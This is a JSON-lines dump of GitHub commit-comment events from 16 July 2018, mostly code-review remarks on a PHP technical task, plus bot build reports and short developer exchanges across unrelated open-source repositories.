{"id":"7970722398","type":"CommitCommentEvent","actor":{"login":"Jamesking56"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720675,"position":214,"line":214,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:38:48Z","updated_at":"2018-07-16T13:38:48Z","author_association":"NONE","body":"Could inline this and the line below to save a variable `echo json_encode($valsObj);`"}},"created_at":"2018-07-16T13:38:48Z"}
{"id":"7970722650","type":"CommitCommentEvent","actor":{"login":"hellodave76"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720676,"position":7,"line":7,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:38:51Z","updated_at":"2018-07-16T13:38:51Z","author_association":"NONE","body":"I'd be tempted to throw an error if the file can't be read, so you know explicitly where it went wrong."}},"created_at":"2018-07-16T13:38:51Z"}
{"id":"7970723109","type":"CommitCommentEvent","actor":{"login":"tpaslou"},"repo":{"name":"ChristophGeske/ARCoreInsideOutTrackingGearVr"},"payload":{"comment":{"id":29720677,"position":null,"line":null,"path":null,"commit_id":"0199023fe71c1f042afa3429f143de1f535b203e","created_at":"2018-07-16T13:38:56Z","updated_at":"2018-07-16T13:38:56Z","author_association":"NONE","body":"Hello \r\nI was trying another way to communicate but didnt find any.I got some issues with scene or camera moving while i m staying stable in the scene.\r\nAny idea ?"}},"created_at":"2018-07-16T13:38:56Z"}
{"id":"7970723212","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29720678,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-16T13:38:57Z","updated_at":"2018-07-16T13:38:57Z","author_association":"MEMBER","body":"My last commit is still waiting on test if the box boot or not.\r\nDepending on which way is working or not we can decide which way to use."}},"created_at":"2018-07-16T13:38:57Z"}
{"id":"7970726058","type":"CommitCommentEvent","actor":{"login":"Olifant1990"},"repo":{"name":"domoticz/domoticz"},"payload":{"comment":{"id":29720690,"position":null,"line":null,"path":null,"commit_id":"154094bdbb2bedad79d5a9bc8336a7fb4fb290be","created_at":"2018-07-16T13:39:27Z","updated_at":"2018-07-16T13:39:27Z","author_association":"CONTRIBUTOR","body":"I think now  domoticz/msbuild/WindowsInstaller/makedist.bat has to be revised too.\r\nHighest version number is not possible anymore?"}},"created_at":"2018-07-16T13:39:27Z"}
{"id":"7970728402","type":"CommitCommentEvent","actor":{"login":"himanshu082"},"repo":{"name":"LindseyNastos/Personal-Project"},"payload":{"comment":{"id":29720693,"position":null,"line":null,"path":null,"commit_id":"0ba45ff5d64265e74890b0b7a2276275007acc32","created_at":"2018-07-16T13:39:54Z","updated_at":"2018-07-16T13:39:54Z","author_association":"NONE","body":"@LindseyNastos  - mdf file is missing, i cannot run the project, could you please add the mdf file please"}},"created_at":"2018-07-16T13:39:54Z"}
{"id":"7970730107","type":"CommitCommentEvent","actor":{"login":"scott-vsi"},"repo":{"name":"VisionSystemsInc/vsi_common"},"payload":{"comment":{"id":29720697,"position":26,"line":26,"path":"linux/relpath","commit_id":"fe02468225c135b3f339eee2a186239e7a88a51c","created_at":"2018-07-16T13:40:13Z","updated_at":"2018-07-16T13:40:13Z","author_association":"CONTRIBUTOR","body":"update this example"}},"created_at":"2018-07-16T13:40:13Z"}
{"id":"7970730412","type":"CommitCommentEvent","actor":{"login":"shingoushori"},"repo":{"name":"shingoushori/simutrans"},"payload":{"comment":{"id":29720699,"position":null,"line":null,"path":null,"commit_id":"54bfdc6f5df42acf98c14c0301f9daf4f65494f0","created_at":"2018-07-16T13:40:16Z","updated_at":"2018-07-16T13:40:16Z","author_association":"OWNER","body":"↓here is the video of this commit\r\nhttps://www.youtube.com/watch?v=VHCKBd7Lsw8"}},"created_at":"2018-07-16T13:40:16Z"}
{"id":"7970733705","type":"CommitCommentEvent","actor":{"login":"eulerto"},"repo":{"name":"eulerto/wal2json"},"payload":{"comment":{"id":29720709,"position":63,"line":63,"path":"sql/filtertable.sql","commit_id":"409fcff4478743d161eb0358d26930773335767a","created_at":"2018-07-16T13:40:49Z","updated_at":"2018-07-16T13:40:49Z","author_association":"OWNER","body":"@OndraZizka don't comment on committed code. Instead, open a **new** issue. Did you read the README? Also, sql/filtertable.sql show how to use the parameter."}},"created_at":"2018-07-16T13:40:49Z"}
{"id":"7970735198","type":"CommitCommentEvent","actor":{"login":"scott-vsi"},"repo":{"name":"VisionSystemsInc/vsi_common"},"payload":{"comment":{"id":29720711,"position":26,"line":26,"path":"linux/relpath","commit_id":"fe02468225c135b3f339eee2a186239e7a88a51c","created_at":"2018-07-16T13:41:03Z","updated_at":"2018-07-16T13:41:03Z","author_association":"CONTRIBUTOR","body":"same"}},"created_at":"2018-07-16T13:41:03Z"}
{"id":"7970740753","type":"CommitCommentEvent","actor":{"login":"danlipsa"},"repo":{"name":"OpenDataAnalytics/kitware-geospatial-recipes"},"payload":{"comment":{"id":29720721,"position":5,"line":16,"path":"recipes/texture-atlas/meta.yaml","commit_id":"af3d7d36f8f4b2d1c7371b01b90631134b38b208","created_at":"2018-07-16T13:41:59Z","updated_at":"2018-07-16T13:41:59Z","author_association":"NONE","body":"Yes:\r\nhttps://anaconda.org/kitware-geospatial/\r\nIt is very similar. The major difference is that we build from master - we needed that at one point. We also might have adjusted libraries dependencies versions so that it works with what we need. We use this in core3d - its not meant to compete with conda-forge."}},"created_at":"2018-07-16T13:41:59Z"}
{"id":"7970744054","type":"CommitCommentEvent","actor":{"login":"cs278"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720731,"position":208,"line":208,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:42:33Z","updated_at":"2018-07-16T13:42:33Z","author_association":"NONE","body":"> Does this work with the space before the ->?\r\n\r\nYeah it's not Python. :wink: "}},"created_at":"2018-07-16T13:42:33Z"}
{"id":"7970745636","type":"CommitCommentEvent","actor":{"login":"Jamesking56"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720739,"position":110,"line":110,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:42:48Z","updated_at":"2018-07-16T13:42:48Z","author_association":"NONE","body":"Here you are calling `count` again, you could reuse `$length` from above to save a bit of memory."}},"created_at":"2018-07-16T13:42:48Z"}
{"id":"7970749896","type":"CommitCommentEvent","actor":{"login":"hlaaftana"},"repo":{"name":"hlaaftana/DiscordG"},"payload":{"comment":{"id":29720744,"position":null,"line":null,"path":null,"commit_id":"a31dee2b1115f1831939aebdef88662a55ac5479","created_at":"2018-07-16T13:43:31Z","updated_at":"2018-07-16T13:43:31Z","author_association":"OWNER","body":"I'm sorry for having an idea stolen from the of in your intellectual idea, but the Idea wha R idea has been stolen was from You. This is an ?idea? from costs £400 dollars"}},"created_at":"2018-07-16T13:43:31Z"}
{"id":"7970752055","type":"CommitCommentEvent","actor":{"login":"sjdawson"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720747,"position":16,"line":16,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:43:53Z","updated_at":"2018-07-16T13:43:53Z","author_association":"NONE","body":"This should be done before the `return` from this function - as it won't get called and would leave the file hanging if the file opened okay and there was data in it. :mag: "}},"created_at":"2018-07-16T13:43:53Z"}
{"id":"7970753198","type":"CommitCommentEvent","actor":{"login":"Jamesking56"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720752,"position":165,"line":165,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:44:04Z","updated_at":"2018-07-16T13:44:04Z","author_association":"NONE","body":"Could inline this and the line below to save a variable `return array_search(max($values), $values);`"}},"created_at":"2018-07-16T13:44:04Z"}
{"id":"7970753970","type":"CommitCommentEvent","actor":{"login":"hellodave76"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720753,"position":21,"line":21,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:44:12Z","updated_at":"2018-07-16T13:44:12Z","author_association":"NONE","body":"I don't think there is a need to pass by reference here, `&` not needed."}},"created_at":"2018-07-16T13:44:12Z"}
{"id":"7970755368","type":"CommitCommentEvent","actor":{"login":"scott-vsi"},"repo":{"name":"VisionSystemsInc/vsi_common"},"payload":{"comment":{"id":29720756,"position":36,"line":36,"path":"linux/uwecho.bsh","commit_id":"fe02468225c135b3f339eee2a186239e7a88a51c","created_at":"2018-07-16T13:44:24Z","updated_at":"2018-07-16T13:44:24Z","author_association":"CONTRIBUTOR","body":"BUGS?\r\n\r\nalso, some of these sentences are confusing"}},"created_at":"2018-07-16T13:44:24Z"}
{"id":"7970756033","type":"CommitCommentEvent","actor":{"login":"Jamesking56"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720761,"position":208,"line":208,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:44:30Z","updated_at":"2018-07-16T13:44:30Z","author_association":"NONE","body":"@hellodave76 Yes it does"}},"created_at":"2018-07-16T13:44:30Z"}
{"id":"7970758235","type":"CommitCommentEvent","actor":{"login":"eloi29"},"repo":{"name":"savoirfairelinux/cukinia"},"payload":{"comment":{"id":29720762,"position":5,"line":379,"path":"cukinia","commit_id":"91fd724e1e5e2a71020a509ae0552f59eae23a6c","created_at":"2018-07-16T13:44:51Z","updated_at":"2018-07-16T13:44:51Z","author_association":"CONTRIBUTOR","body":"why just keeping like it is and do:\r\n`[ \"$(grep Name \"$status\" | cut -f 2)\" = ${pname:0:15} ] || continue`\r\n"}},"created_at":"2018-07-16T13:44:51Z"}
{"id":"7970759023","type":"CommitCommentEvent","actor":{"login":"bobbieltd"},"repo":{"name":"MoneroOcean/nodejs-pool"},"payload":{"comment":{"id":29720765,"position":null,"line":null,"path":null,"commit_id":"cdbc9a0ab966d4721215b171c89ae068145e45e7","created_at":"2018-07-16T13:45:00Z","updated_at":"2018-07-16T13:45:00Z","author_association":"NONE","body":"+1, cool. Can your pool innovation mine multiple algos at the same time ? Or you choose algo based on the whole of all miners, not individual."}},"created_at":"2018-07-16T13:45:00Z"}
{"id":"7970760413","type":"CommitCommentEvent","actor":{"login":"Ishan-Kumar"},"repo":{"name":"GauravKumarQA/AutomationFrameworkUsingTestNG"},"payload":{"comment":{"id":29720772,"position":null,"line":null,"path":null,"commit_id":"f7c1ef1d481bd79c9242345b954a28f3902c17f7","created_at":"2018-07-16T13:45:14Z","updated_at":"2018-07-16T13:45:14Z","author_association":"COLLABORATOR","body":"Code Structure needs a thorough review. \r\nApart from it Please Remove .class files, screenshots, Maven Libs and reports from the Repo. Keep the repository as light as possible.  \r\n"}},"created_at":"2018-07-16T13:45:14Z"}
{"id":"7970762840","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29720783,"position":null,"line":null,"path":null,"commit_id":"e4712cce233d9dd74184cc09b4d8894a5f12cef8","created_at":"2018-07-16T13:45:37Z","updated_at":"2018-07-16T13:45:37Z","author_association":"COLLABORATOR","body":"this changes makes for an erratic behavior in my end, the first time I select the transfer"}},"created_at":"2018-07-16T13:45:37Z"}
{"id":"7970764667","type":"CommitCommentEvent","actor":{"login":"peterdemin"},"repo":{"name":"bulkan/robotframework-requests"},"payload":{"comment":{"id":29720789,"position":null,"line":null,"path":null,"commit_id":"79dde3061e9f7348ecb3719e31292762f04793ac","created_at":"2018-07-16T13:45:54Z","updated_at":"2018-07-16T13:45:54Z","author_association":"CONTRIBUTOR","body":"As you can see in the test, it's\r\n```\r\n${resp.json()['files']['file']}\r\n```\r\nwhere `resp.json()` returns the dictionary, that can be accessed in usual python way."}},"created_at":"2018-07-16T13:45:54Z"}
{"id":"7970770066","type":"CommitCommentEvent","actor":{"login":"hellodave76"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720794,"position":208,"line":208,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:46:47Z","updated_at":"2018-07-16T13:46:47Z","author_association":"NONE","body":"TIL!"}},"created_at":"2018-07-16T13:46:47Z"}
{"id":"7970773455","type":"CommitCommentEvent","actor":{"login":"Bolth"},"repo":{"name":"Bolth/exaet"},"payload":{"comment":{"id":29720806,"position":72,"line":72,"path":".gitignore","commit_id":"c45e99eafbba96a9f7e48f1240d84199fccb0798","created_at":"2018-07-16T13:47:21Z","updated_at":"2018-07-16T13:47:21Z","author_association":"OWNER","body":"- \r\n\r\n- \r\n### \r\n> #543## **ki**\r\n### ****\r\n > sg.fjy.\r\n\r\n> ### __[](url)"}},"created_at":"2018-07-16T13:47:21Z"}
{"id":"7970774004","type":"CommitCommentEvent","actor":{"login":"cfra"},"repo":{"name":"opensourcerouting/frr"},"payload":{"comment":{"id":29720811,"position":13,"line":13,"path":"isisd/fabricd.conf.sample","commit_id":"7157cce2785bca34540d316c5b47101787e7fef1","created_at":"2018-07-16T13:47:26Z","updated_at":"2018-07-16T13:47:26Z","author_association":"NONE","body":"[RFC8196](https://tools.ietf.org/html/rfc8196) more or less works towards that direction.\r\nUnfortunately it's somewhat too specific and prescribes the use of broadcast networks and level-1 which conflicts with the requirements of OpenFabric. :/"}},"created_at":"2018-07-16T13:47:26Z"}
{"id":"7970777064","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29720821,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-16T13:47:57Z","updated_at":"2018-07-16T13:47:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T13:47:57Z"}
{"id":"7970778158","type":"CommitCommentEvent","actor":{"login":"hellodave76"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720825,"position":208,"line":208,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:48:08Z","updated_at":"2018-07-16T13:48:08Z","author_association":"NONE","body":"> Yeah it's not Python\r\n\r\n```python\r\nimport sensibleUseOfWhitespace\r\n```"}},"created_at":"2018-07-16T13:48:08Z"}
{"id":"7970785714","type":"CommitCommentEvent","actor":{"login":"Bolth"},"repo":{"name":"Bolth/exaet"},"payload":{"comment":{"id":29720837,"position":62,"line":62,"path":"LICENSE","commit_id":"c45e99eafbba96a9f7e48f1240d84199fccb0798","created_at":"2018-07-16T13:49:23Z","updated_at":"2018-07-16T13:49:23Z","author_association":"OWNER","body":"@web-flow "}},"created_at":"2018-07-16T13:49:23Z"}
{"id":"7970787605","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29720842,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-16T13:49:42Z","updated_at":"2018-07-16T13:49:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T13:49:42Z"}
{"id":"7970790914","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29720846,"position":null,"line":null,"path":null,"commit_id":"5dfc07ba8ac5510f7f591b7293838b026d0f9bff","created_at":"2018-07-16T13:50:15Z","updated_at":"2018-07-16T13:50:15Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-67](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-67).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-67-next50.pantheonsite.io/)"}},"created_at":"2018-07-16T13:50:15Z"}
{"id":"7970791847","type":"CommitCommentEvent","actor":{"login":"sjdawson"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29720849,"position":92,"line":92,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T13:50:25Z","updated_at":"2018-07-16T13:50:25Z","author_association":"NONE","body":"Did some _(or all)_ of this method get copied and pasted from elsewhere?\r\n\r\nThat's not a problem, but it shows up a more interesting side-effect, which is that this method is tab indented rather than spaces, and doesn't follow the style of coding that has come before it. Where consistency is key in maintaining a larger codebase, having everything formatted the same works wonders for readability and overall, just looks smarter!\r\n\r\nYou could try looking up the PSR for PHP (Though I understand this may not fit your primary choice of language)\r\n* https://www.php-fig.org/psr/\r\n\r\nEditorConfig is an excellent tool to have as part of your IDE / text-editor if it supports it. It makes working on multiple projects/files much simpler by setting the correct configurations in your editor on a per-project basis.\r\n* https://editorconfig.org/"}},"created_at":"2018-07-16T13:50:25Z"}
{"id":"7970793632","type":"CommitCommentEvent","actor":{"login":"Bolth"},"repo":{"name":"Bolth/exaet.com"},"payload":{"comment":{"id":29720855,"position":2,"line":2,"path":"LICENSE","commit_id":"c45e99eafbba96a9f7e48f1240d84199fccb0798","created_at":"2018-07-16T13:50:42Z","updated_at":"2018-07-16T13:50:42Z","author_association":"OWNER","body":"[``](\r\n\r\n- [ ] url\r\n\r\n)"}},"created_at":"2018-07-16T13:50:42Z"}
{"id":"7970796068","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29720876,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-16T13:51:07Z","updated_at":"2018-07-16T13:51:07Z","author_association":"MEMBER","body":"Now update.sh will manage Makefile changes, this way is better in my opinion as you don't need to compile everything again and just last step (ubinfi) will be different ;)"}},"created_at":"2018-07-16T13:51:07Z"}
{"id":"7970799175","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaAssociation/ncurses"},"payload":{"comment":{"id":29720920,"position":null,"line":null,"path":null,"commit_id":"4709dee2ff9fb3d0af8ed99b4fddfcf0ff045425","created_at":"2018-07-16T13:51:38Z","updated_at":"2018-07-16T13:51:38Z","author_association":"MEMBER","body":"@berolinux still does not work. Can you please check again ? https://abf.openmandriva.org/build_lists/231370"}},"created_at":"2018-07-16T13:51:38Z"}
{"id":"7970800970","type":"CommitCommentEvent","actor":{"login":"JapaMala"},"repo":{"name":"JapaMala/armok-vision"},"payload":{"comment":{"id":29720950,"position":null,"line":null,"path":null,"commit_id":"bbb87029d5db2f8ed72196d3529057116f61ed09","created_at":"2018-07-16T13:51:56Z","updated_at":"2018-07-16T13:51:56Z","author_association":"OWNER","body":"![unknown](https://user-images.githubusercontent.com/288477/42762266-7aa5abf2-892d-11e8-9558-86f589efae4a.png)\r\nIt looks like this, so far."}},"created_at":"2018-07-16T13:51:56Z"}
{"id":"7970807034","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"OpenDataAnalytics/kitware-geospatial-recipes"},"payload":{"comment":{"id":29721026,"position":5,"line":16,"path":"recipes/texture-atlas/meta.yaml","commit_id":"af3d7d36f8f4b2d1c7371b01b90631134b38b208","created_at":"2018-07-16T13:52:53Z","updated_at":"2018-07-16T13:52:53Z","author_association":"NONE","body":"Gotcha. Makes sense. Bases on your experience, would you suggest other\nproject to create their own channel ? E.g \"kitware-paraview\", \"\nkitware-slicer\", etc....\n\nAlso if someone adds the two channels, conda-forge and kitware-geospatial,\nhow can you ensure the correct vtk version is downloaded ?\n\n\n\nOn Mon, Jul 16, 2018, 9:42 AM Dan Lipsa <notifications@github.com> wrote:\n\n> Yes:\n> https://anaconda.org/kitware-geospatial/\n> It is very similar. The major difference is that we build from master - we\n> needed that at one point. We also might have adjusted libraries\n> dependencies versions so that it works with what we need. We use this in\n> core3d - its not meant to compete with conda-forge.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OpenDataAnalytics/kitware-geospatial-recipes/commit/af3d7d36f8f4b2d1c7371b01b90631134b38b208#commitcomment-29720721>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AANXo29iKFgMDLRABtmrEG9YRDg1BNgKks5uHJgngaJpZM4VRHkx>\n> .\n>\n"}},"created_at":"2018-07-16T13:52:53Z"}
{"id":"7970808415","type":"CommitCommentEvent","actor":{"login":"BenLubar"},"repo":{"name":"JapaMala/armok-vision"},"payload":{"comment":{"id":29721031,"position":null,"line":null,"path":null,"commit_id":"bbb87029d5db2f8ed72196d3529057116f61ed09","created_at":"2018-07-16T13:53:07Z","updated_at":"2018-07-16T13:53:07Z","author_association":"CONTRIBUTOR","body":"That's actually a lot more impressive than I was expecting this early on. :thumbsup:"}},"created_at":"2018-07-16T13:53:07Z"}
{"id":"7970810571","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29721033,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-16T13:53:27Z","updated_at":"2018-07-16T13:53:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T13:53:27Z"}
{"id":"7970817972","type":"CommitCommentEvent","actor":{"login":"zaufi"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29721046,"position":5,"line":323,"path":"CMakeLists.txt","commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T13:54:37Z","updated_at":"2018-07-16T13:54:37Z","author_association":"CONTRIBUTOR","body":"What `boost` do you have?"}},"created_at":"2018-07-16T13:54:37Z"}
{"id":"7970822908","type":"CommitCommentEvent","actor":{"login":"zaufi"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29721057,"position":null,"line":null,"path":null,"commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T13:55:20Z","updated_at":"2018-07-16T13:55:20Z","author_association":"CONTRIBUTOR","body":"It'll be nice to attach the patch to the upstream bug as well %)"}},"created_at":"2018-07-16T13:55:20Z"}
{"id":"7970826764","type":"CommitCommentEvent","actor":{"login":"taq"},"repo":{"name":"w0rp/ale"},"payload":{"comment":{"id":29721065,"position":null,"line":null,"path":null,"commit_id":"fcd62342d531bdeacbd41a8dfa6163301f1fdf9b","created_at":"2018-07-16T13:55:55Z","updated_at":"2018-07-16T13:55:55Z","author_association":"NONE","body":"Next Saturday I'll make a Vim workshop when I'll show some plugins, ALE and Tagbar included, and was worried about telling people to custom their .vimrc files with those changes, now everything is good, thank you!"}},"created_at":"2018-07-16T13:55:55Z"}
{"id":"7970828155","type":"CommitCommentEvent","actor":{"login":"KacperMadej"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":29721066,"position":null,"line":null,"path":null,"commit_id":"83b5d3187504d7aaec8549ba929401c73fc82284","created_at":"2018-07-16T13:56:09Z","updated_at":"2018-07-16T13:56:09Z","author_association":"CONTRIBUTOR","body":"Hi @wildlyinaccurate \r\nThere's no official plans to do so."}},"created_at":"2018-07-16T13:56:09Z"}
{"id":"7970830297","type":"CommitCommentEvent","actor":{"login":"x86cpu"},"repo":{"name":"x86cpu/android_kernel_lge_msm8996"},"payload":{"comment":{"id":29721070,"position":null,"line":null,"path":null,"commit_id":"2f1dcea99977c82d7dedc4ba27357e753073f3a3","created_at":"2018-07-16T13:56:26Z","updated_at":"2018-07-16T13:56:26Z","author_association":"OWNER","body":"No, I merged it myself from marlin kernel.  There are others to activate the energy profile too though."}},"created_at":"2018-07-16T13:56:26Z"}
{"id":"7970836147","type":"CommitCommentEvent","actor":{"login":"sfloess"},"repo":{"name":"solenopsis/Solenopsis"},"payload":{"comment":{"id":29721079,"position":null,"line":null,"path":null,"commit_id":"aca3fbabe2ea9b60d6c4c47acbafe18fc2ee6b50","created_at":"2018-07-16T13:57:24Z","updated_at":"2018-07-16T13:57:24Z","author_association":"MEMBER","body":"\n@pcon - I forgot completely about the environments dir and thought I had \nstupidly put that in there way back when...which is why I removed it...\n\nDefinitely agree with what you mention!\n\nI'll fix it!\n\nOn Mon, 16 Jul 2018, Patrick Connelly wrote:\n\n> \n> @sfloess I think this is a regression. Anyone that has it set up to use the environments path will no longer work. I would be fine if this read\n> \n> <property file=\"${initial.solenopsis.env.HOME}/environments/${sf.env}.properties\"/>\n> <property file=\"${initial.solenopsis.env.HOME}/credentials/${sf.env}.properties\"/>\n> \n> so that it loaded it from either place, but removing the environments as a whole will lead to some confusion.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.[AAbTCZmslqPCKT2DIVWwn7mRqeXw2YmDks5uHJUegaJpZM4VRIL4.gif]\n> \n> \n>\n\n\nSincerely,\n\n\nScot P. Floess   RHCT (Certificate Number 605010084735240)\n\n+--------------------------------------------------------+\n|                      Projects                          |\n+--------------------------------------------------------+\n\nPersonal        https://github.com/sfloess\nArchitect       https://github.com/FlossWare\nCo-Architect    https://github.com/Solenopsis\n\nContributor     https://github.com/Quest-For-Knowledge\nContributor     https://github.com/sahabhaagita"}},"created_at":"2018-07-16T13:57:24Z"}
{"id":"7970841958","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29721087,"position":25,"line":112,"path":"src/vs/workbench/browser/parts/editor/breadcrumbs.ts","commit_id":"dd54e6ec1bbd2a6aab944cabaee65a563052935c","created_at":"2018-07-16T13:58:23Z","updated_at":"2018-07-16T13:58:23Z","author_association":"MEMBER","body":"thx"}},"created_at":"2018-07-16T13:58:23Z"}
{"id":"7970848307","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29721092,"position":null,"line":null,"path":null,"commit_id":"1793f2cbed711c3de6154262a620374141c9ec44","created_at":"2018-07-16T13:59:26Z","updated_at":"2018-07-16T13:59:26Z","author_association":"COLLABORATOR","body":">are we sure the line corresponds to the the actual source code?\r\n\r\nDidn't double check, thought this hadn't changed much, you might be right though."}},"created_at":"2018-07-16T13:59:26Z"}
{"id":"7970848712","type":"CommitCommentEvent","actor":{"login":"ror-shubham"},"repo":{"name":"aeternity/aepp-components"},"payload":{"comment":{"id":29721093,"position":7,"line":4,"path":"package.json","commit_id":"736ed363426177d7f381c622ee5894f978c3f769","created_at":"2018-07-16T13:59:31Z","updated_at":"2018-07-16T13:59:31Z","author_association":"NONE","body":"There is no file named aepp-components.js after build. Do you mean aepp.components.js?"}},"created_at":"2018-07-16T13:59:31Z"}
{"id":"7970850810","type":"CommitCommentEvent","actor":{"login":"hgy123"},"repo":{"name":"hgy123/hgy.github.io"},"payload":{"comment":{"id":29721096,"position":null,"line":null,"path":null,"commit_id":"aef369f8e8bf7d80938a1e104baf6c399005e415","created_at":"2018-07-16T13:59:50Z","updated_at":"2018-07-16T13:59:50Z","author_association":"OWNER","body":"hello world!"}},"created_at":"2018-07-16T13:59:50Z"}
